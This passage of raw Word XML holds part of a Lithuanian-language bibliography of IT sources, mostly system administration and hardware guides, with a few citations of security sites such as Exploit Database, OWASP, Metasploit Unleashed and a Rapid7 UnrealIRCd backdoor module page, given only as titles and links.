          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">InfoTechRam. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId372">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.infotechram.com/index.php/2019/12/30/how-to-install-system-center-service-manager-2019/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EAF2A4A"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Ramabadran V. (2019, balandžio 11). Windows server 2019 Step-By-Step: Setup Active Directory environment using PowerShell. Microsoft TechNet. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId373" w:anchor="Step_1_Login_as_Local_Admin" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://social.technet.microsoft.com/wiki/contents/articles/52765.windows-server-2019-step-by-step-setup-active-directory-environment-using-powershell.aspx#Step_1_Login_as_Local_Admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10F624F0"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Reddy, P. (2020, vasario 10). Top 10 Operating Systems for Ethical Hackers and Penetration Testers (2020 List). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Medium.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId374">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DF3CCAD"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Router wifi settings gone after power outage</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2018, lapkričio 21).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Netgear Community.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId375">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.netgear.com/t5/Nighthawk-WiFi-Routers/Router-wifi-settings-gone-after-power-outage/td-p/1667153</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CFFD940"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RV340 lost his configuration after power outage.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2020, birželio 6). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cisco Community.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId376">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1E3E1BE8"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SDRAM vs DDR: what are the differences? </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Crucial. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://www.crucial.com/articles/about-memory/difference-among-ddr2-ddr3-and-ddr4-memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC15AD6"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Search Engine Watch. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId377">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.searchenginewatch.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47C6AF7D"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Set up incident generation in Service Manager. (2018, sausio 23). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId378">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/dcm-incidents?view=sc-sm-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C472FE5"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rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Shovon, S. (2020). How to Install CentOS 8 on VirtualBox. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LINUX HINT</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId379">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://linuxhint.com/install_centos8_virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="420523BB"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System requirements for AutoCAD 2021 including Specialized Toolsets. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Autodesk. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId380">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A3897F8"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System Requirements for Autodesk Maya 2020. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Autodesk. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>https://knowledge.autodesk.com/support/maya/learn-explore/caas/sfdcarticles/sfdcarticles/System-requirements-for-Autodesk-Maya-2020.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AF988"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SlavaSoft Downloads. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SlavaSoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId381">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.slavasoft.com/download.htm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33B3BA96"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SolidWorks and SW Data Management System Requirements. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SolidWorks.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId382">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.solidworks.com/support/system-requirements</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1109E0B7"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Tavares, P. (2021, sausio 7). Installing and Configuring CentOS 8 on Virtualbox [updated 2021]. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Infosec. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId383">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://resources.infosecinstitute.com/topic/installing-configuring-centos-7-virtualbox/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42FE8640"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The BIOS does not detect or recognise the ATA/SATA hard drive. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Seagate. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId384">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="397120D0"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The BIOS does not detect or recognize the Solid State Drive. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Seagate. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId385">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-solid-state-drive-005707en/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4404A40E"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>The Exploit Database. The Exploit Database is a non-profit project that is provided as a public service by Offensive Security.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId386">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0116746C"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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>The Open Web Application Security Project.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nonprofit foundation that works to improve the security of software</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId387">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="557D03B6"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Tips to improve PC performance in Windows 10. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId388">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://support.microsoft.com/en-us/windows/tips-to-improve-pc-performance-in-windows-10-</w:t>
        </w:r>
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:t>b3b3ef5b-5953-fb6a-2528-4bbed82fba96</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38044AF7"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Touch, J. ir kiti (2021, sausio 15). Service Name and Transport Protocol Port Number Registry. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">IANA. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId389">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17BCAF9D"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Troubleshoot computer problems with Service Manager tasks. (2016, spalio 12). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId390">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/troubleshoot-with-tasks?view=sc-sm-2019#run-a-task-from-an-incident-view</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CA9D142"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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Twitter.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId391">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://twitter.com/tos</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59CDA5CB"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Unreal IRCD 3.2.8.1 Backdoor Command Execution. (2018, gegužės 30). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Rapid7 Vulnerability &amp; Exploit Database</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId392">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="415E4E43"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Use management packs to add functionality to Service Manager. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mircosoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą: https://docs.microsoft.com/en-us/system-center/scsm/management-packs?view=sc-sm-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED414C"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Use Service Manager runbooks to automate procedures. (2016, spalio 12).</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId393" w:anchor="runbooks-in-service-manager">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/system-center/scsm/runbooks?view=sc-sm-2019#runbooks-in-service-manager</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DEEDC18"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Using the MSFconsole Interface. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive security. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId394">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/Msfconsole/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F7E7C9A"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rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Windows Server Backup to back up and restore Exchange data. (2020, liepos 1). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="none"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId395" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:kern w:val="0"/>
            <w:lang w:val="lt-LT" w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="427F11C3"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VLAN Configuration Commands Step by Step Explained.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId396">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD93C4F"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VLAN Practice Lab Setup in Packet Tracer. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Computer networking notes.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId397">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BEB6DB3"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VMware Workstation 16 Player. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
